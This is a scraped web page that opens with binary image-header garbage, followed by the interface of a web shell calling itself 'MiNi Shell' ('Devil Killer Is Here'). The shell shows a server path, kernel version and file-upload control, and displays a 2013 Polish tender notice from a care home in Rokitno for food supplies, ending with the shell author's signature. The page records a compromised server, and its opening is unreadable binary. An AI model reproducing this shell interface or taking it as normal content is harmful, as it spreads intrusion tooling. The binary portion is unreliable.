JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20131129/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20131129/491878-N-2013.html

<p class="kh_header"><b>Przytoczna: DOSTAWA ARTYKUŁÓW SPOŻYWCZYCH NA 2014 ROK</b><br>
<b>Numer ogłoszenia: 491878 - 2013; data zamieszczenia: 29.11.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Dom Pomocy Społecznej , Rokitno 58, 66-340 Przytoczna, woj. lubuskie, tel. 0-95 7493024, 7494032, faks 0-95 7493024.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.miedzyrzecz.dps5.bip.net.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> DOSTAWA ARTYKUŁÓW SPOŻYWCZYCH NA 2014 ROK.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Dyrektor Domu Pomocy Społecznej 66-340 Rokitno Nr 58 informuje, iż przedmiotem
zamówienia jest dostawa artykułułów spożywczych na 2014 rok, kod wiodący CPV 
15000000-8,  z podziałem na 7 części / od A do G / 

Część A - żywność, napoje i produkty pośrednie - kod CPV 15000000-8

Lp.	Nazwa	                    Jednost.miary Planowana wielkość zamówienia
1.	Ogórek konserwowy - 0,9 l	szt.	360
2.	Koncentrat pomidorowy - 0,9 kg	szt.	100
3.	Groch - 1 kg	kg	100
4.	Groszek konserwowy - 400 g	szt.	200
5.	Fasola - 1 kg	kg	120
6.	Fasolka konserwowa - 700 g	szt.	60
7.	Marchew konserwowa - 700 g	szt.	200
8.	Ćwikła - 280 g	szt.	200
9.	Ketchup - 500 g	szt.	100
10.	Majonez - 700 g	szt.	120
11.	Musztarda - 200 g	szt.	210
12.	Kapusta konserwowa czerwona - 0,9 l	szt.	360
13.	Sałatka wielowarzywna - 0,9 l	szt.	390
14.	Koncentrat szczawiowy - 300 g	szt.	60
15.	Ogórek kwaszony - 5 kg	kg	460
16.	Kapusta kwaszona - 5 kg	kg	350
17.	Pasztet drobiowy - 500 g	szt.	290
18.	Konserwa mięsna - 300 g	szt.	60
19.	Konserwa rybna - 170 g	szt.	840
20.	Paprykarz szczeciński - 300 g	szt.	510
21.	Cukier - 1 kg	kg	1200
22.	Kasz jęczmięnna - 1 kg	kg	160
23.	Kasza manna - 1,0 kg	kg	100
24.	Ryż - 1 kg	kg	150
25.	Płatki owsiane - 0,5 kg	kg	180
26.	Płatki kukurydziane - 250 g	szt.	100
27.	Mąka wrocławska - 1 kg	kg	500
28.	Mąka ziemniaczana - 1 kg	kg	20
29.	Olej - 1 l	l	200
30.	Żurek - 1 kg	kg	42
31	Sól - 1 kg	kg	400
32	Makaron rosołowy / nitki/- ilość w kg 	kg	150
33	Bułka tarta - 0,5 kg	kg	270
34	Galaretka owocowa - 75 g	szt	1500
35	Kisiel - 40 g	szt	1500
36	Budyń - 	szt.	120
37	Kompoty - 0,9 l	szt.	360
38	Kawa Inka - 150 g	szt	870
39	Herbata - 100 g	kg	50
40	Ocet - 0,5 l	szt.	130
41	Pieprz naturalny mielony 20 g	szt	600
42	Pieprz ziołowy - 15 g	szt	330
43	Przyprawa do zup w płynie - 1 l	l	75
44	Majeranek 15 g	szt	350
45	Zaprawa do napojów, różne smaki - 0,5 litra	szt	540
46	Przyprawa do zup w proszku - 0,2 kg	szt	380
47	Papryka słodka mielona - 20 g	szt	250
48	Czosnek mielony - 20 g	szt	300
49	Kakao - 100 g	szt	520
50	Herbata owocowa ekspresowa - 2 g x 20 szt.	szt	840
51	Sos pieczeniowy - 30 g	szt	360
52	Zupa ogonowa - 1 kg	kg	48
53	Rosół z kury - 170 g	szt	120
54	Zupa pieczarkowa - 1 kg	kg	40
55	kukurydza konserwowa - 400 g	szt.	120
56	Miód naturalny - 370g	szt	20
57	Cynamon - 20g	szt	30
58	Kwasek cytrynowy - 20 g	szt	60
59	Chrzan - 280 g	szt	190
60	Liść laurowy - 10 g	szt	60

Część B - mięso i wędliny- kod CPV 15100000-9
Lp.	Nazwa	Jedn. miary	Planowana wielkość zamówienia

1.		Karkówka bez kości	kg	220
2.		Łopatka bez kości	kg	100
3.		Schab bez kości	kg	330 
4.		Schab z kością	kg	350
5.		Mięso mielone	kg	220
6.		Mięso gulaszowe	kg	320
7.		Kiełbasa mortadela	kg	130
8.		Kiełbasa biała parzona	kg	200
9.		Kiełbasa Piwna 	kg	115
10.		Kiełbasa szynkowa	kg	50
11.		Kiełbasa żywiecka	kg	30
12.		Kiełbasa zwyczajna	kg	240
13.		Kiełbasa śląska	kg	180
14.		Kiełbasa parówkowa	kg	210
15.		Wątrobianka	kg	70
16.		Salceson biały	kg	170
17.		Metka cebulowa	kg	170
18.		Łopatka faszerowana	kg	150
19.		Kaszanka	kg	180
20.		Pieczeń rzymska	kg	160
21.		Boczek faszerowany	kg	150
22.		Żeberka wieprzowe	kg	300
23.		Szynka gotowana wędzona	kg	90
24.		Smalec -0,2 kg	kg	50
25.		Boczek wędzony parzony	kg	50 

Część C  - drób świeży- kod CPV 15112100-7
Lp.	Nazwa	Jedn. miary	Planowana wielkość zamówienia

1.		Kurczak świeży	kg	280
2.		Ćwiartka z kurczaka	kg	380
3.		Porcje rosołowe	kg	700
4.		Wątróbka 	kg	45

Część D - art. nabiałowe i mleczarskie- kod CPV 15510000-6
Lp.	Nazwa	Jedn. miary	Planowana wielkość zamówienia

1.		Ser tylżycki	kg	150
2.		Ser topiony	kg	100
3.		Mleko w proszku	kg	1200
4.		Masło extra nie mniej  niż 82 % tłuszczu	kg	900
5.		Margaryna - 0,25 kg	kg	75
6.		Masło roślinne - 0,5 kg	kg	130
7.		Śmietana 18% - 0,5 l	l	670
8.		Twaróg półtłusty - ilość w kg	kg	330
9.		Jogurt owocowy - 125 g	szt.	4900
10.		Kefir naturalny - 400 g	szt.	300

Część E  - pieczywo - kod CPV 15810000-9
Lp.	Nazwa	Jedn. miary	Planowana wielkość zamówienia

1	Chleb baltonowski - 1 kg	szt.	6.500
2	Chleb razowy - 1 kg	szt.	1.300
3	Bułka wrocławska - 0,10 kg	szt.	18.300

Część F - ryba - kod CPV 15220000-6
Lp.	Nazwa	Jedn. miary	Planowana wielkość zamówienia

1	Śledź matyjas	kg	250
2	Makrela wędzona	kg	150
3	Filety z PANGI                     	kg	460
4	Burger rybny z warzywami	kg	200

Załącznik G - mrożonki - kod CPV 15331170-9
Lp.	Nazwa	Jedn. miary	Planowana wielkość zamówienia

1	Pierogi z mięsem	kg	120
2	Pierogi ruskie      	kg	120
3	Flaki wieprzowe	kg	90
4	Zupa wiosenna 	kg	140
5	Włoszczyzna paski	kg	760.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 15.10.00.00-9, 15.11.21.00-7, 15.51.00.00-6, 15.81.00.00-9, 15.22.00.00-6, 15.33.11.70-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 7.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Rozpoczęcie: 02.01.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie / spełnia - nie spełnia /</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie / spełnia - nie spełnia /</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie / spełnia - nie spełnia /</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie / spełnia - nie spełnia /</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie / spełnia - nie spełnia /</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

</ul>



<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.miedzyrzecz.dps5.bip.net.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Dom Pomocy Społecznej
	Rokitno Nr 58   66 - 340 Przytoczna  
	tel. / fax 095 / 7493024 lub 095/7943032.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 11.12.2013 godzina 10:00, miejsce: Sekretariat Domu Pomocy Społecznej
	Rokitno Nr 58   66 - 340 Przytoczna.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com